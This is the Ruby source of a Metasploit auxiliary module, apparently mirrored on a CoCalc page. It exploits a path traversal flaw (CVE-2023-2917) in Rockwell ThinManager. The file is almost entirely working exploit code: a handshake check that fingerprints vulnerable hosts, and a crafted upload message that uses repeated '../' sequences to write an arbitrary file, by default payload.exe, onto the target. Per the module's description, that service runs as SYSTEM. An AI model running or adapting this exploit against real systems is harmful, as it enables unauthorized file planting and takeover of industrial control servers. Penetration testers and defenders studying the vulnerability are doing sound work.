CoCalc -- thinmanager_traversal

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/networking/thinmanager_traversal_upload2.rb
¹⁹⁵⁷⁹ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Report
9
  prepend Msf::Exploit::Remote::AutoCheck
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'ThinManager Path Traversal (CVE-2023-2917) Arbitrary File Upload',
16
        'Description' => %q{
17
          This module exploits a path traversal vulnerability (CVE-2023-2917) in
18
          ThinManager <= v13.1.0 to upload arbitrary files to the target system.
19
          The affected service listens by default on TCP port 2031 and runs in the
20
          context of NT AUTHORITY\SYSTEM.
21
        },
22
        'Author' => [
23
          'Michael Heinzl', # MSF Module
24
          'Tenable' # Discovery and PoC
25
        ],
26
        'License' => MSF_LICENSE,
27
        'References' => [
28
          ['CVE', '2023-2917'],
29
          ['URL', 'https://www.tenable.com/security/research/tra-2023-28'],
30
          ['URL', 'https://support.rockwellautomation.com/app/answers/answer_view/a_id/1140471']
31
        ],
32
        'DisclosureDate' => '2023-08-17',
33
        'DefaultOptions' => {
34
          'RPORT' => 2031,
35
          'SSL' => false
36
        },
37
        'Notes' => {
38
          'Stability' => [CRASH_SAFE],
39
          'Reliability' => [],
40
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
41
        }
42
      )
43
    )
44

45
    register_options(
46
      [
47
        OptPath.new('LFILE', [false, 'The local file to transfer to the remote system.', '/tmp/payload.exe']),
48
        OptString.new('RFILE', [false, 'The file path to store the file on the remote system.', '/Program Files/Rockwell Software/ThinManager/payload.exe']),
49
        OptInt.new('DEPTH', [ true, 'The traversal depth. The FILE path will be prepended with ../ * DEPTH', 7 ])
50
      ]
51
    )
52
  end
53

54
  def check
55
    begin
56
      connect
57
    rescue Rex::ConnectionTimeout
58
      print_error("Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed.")
59
      return Exploit::CheckCode::Unknown
60
    end
61

62
    vprint_status('Sending handshake...')
63
    handshake = [0x100].pack('V')
64
    vprint_status(Rex::Text.to_hex_dump(handshake))
65
    sock.put(handshake)
66

67
    res = sock.get_once(4096, 5)
68
    expected_header = "\x00\x04\x00\x01\x00\x00\x00\x08".b
69

70
    if res&.start_with?(expected_header)
71
      vprint_status('Received handshake response.')
72
      vprint_status(Rex::Text.to_hex_dump(res))
73
      disconnect
74
      return Exploit::CheckCode::Detected
75
    elsif res
76
      vprint_status('Received unexpected handshake response:')
77
      vprint_status(Rex::Text.to_hex_dump(res))
78
      disconnect
79
      return Exploit::CheckCode::Safe
80
    else
81
      disconnect
82
      return Exploit::CheckCode::Unknown('No handshake response received.')
83
    end
84
  end
85

86
  def mk_msg(msg_type, flags, data)
87
    dlen = data.length
88
    hdr = [msg_type, flags, dlen].pack('nnN')
89
    hdr + data
90
  end
91

92
  def run
93
    begin
94
      connect
95
    rescue Rex::ConnectionTimeout => e
96
      fail_with(Failure::Unreachable, "Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed: #{e.message}")
97
    end
98

99
    print_status('Sending handshake...')
100
    handshake = [0x100].pack('V')
101
    vprint_status(Rex::Text.to_hex_dump(handshake))
102
    sock.put(handshake)
103

104
    res = sock.get_once(4096, 5)
105
    if res
106
      print_status('Received handshake response.')
107
      vprint_status(Rex::Text.to_hex_dump(res))
108
    else
109
      print_error('No handshake response received.')
110
      fail_with(Failure::Unreachable, "Connection to #{datastore['RHOSTS']}:#{datastore['RPORT']} failed: #{e.message}")
111
    end
112

113
    lfile = datastore['LFILE']
114
    rfile = datastore['RFILE']
115
    file_data = ::File.binread(lfile)
116
    print_status("Read #{file_data.length} bytes from #{lfile}")
117

118
    traversal = '../' * datastore['DEPTH']
119

120
    full_path = (traversal + rfile).force_encoding('ASCII-8BIT')
121
    file_data.force_encoding('ASCII-8BIT')
122

123
    begin
124
      data = [0xaa].pack('N')
125
      data << [0xbb].pack('N')
126
      data << full_path + "\x00"
127
      data << "file_type\x00"
128
      data << "unk_str3\x00"
129
      data << "unk_str4\x00"
130
      data << [file_data.length].pack('N')
131
      data << [file_data.length].pack('N')
132
      data << file_data
133
      data.force_encoding('ASCII-8BIT')
134

135
      req = mk_msg(38, 0x0021, data)
136
    rescue StandardError => e
137
      fail_with(Failure::BadConfig, "Failed to build upload request: #{e.class} - #{e.message}")
138
    end
139

140
    print_status("Uploading #{lfile} as #{rfile} on the remote host...")
141

142
    print_status("Upload request length: #{req.length} bytes")
143
    vprint_status("Upload request:\n#{Rex::Text.to_hex_dump(req)}")
144

145
    sock.put(req)
146

147
    begin
148
      res = sock.get_once(4096, 5)
149
      if res
150
        print_good('Received response from target:')
151
        vprint_status(Rex::Text.to_hex_dump(res))
152
      else
153
        print_warning('No response received after upload.')
154
      end
155
    rescue ::EOFError, ::Timeout::Error => e
156
      print_error("Socket error: #{e.class} - #{e.message}")
157
    end
158

159
    disconnect
160
    print_good("Upload process completed. Check if '#{rfile}' exists on the target.")
161
  end
162

163
end
164

165
Product

Resources

Company
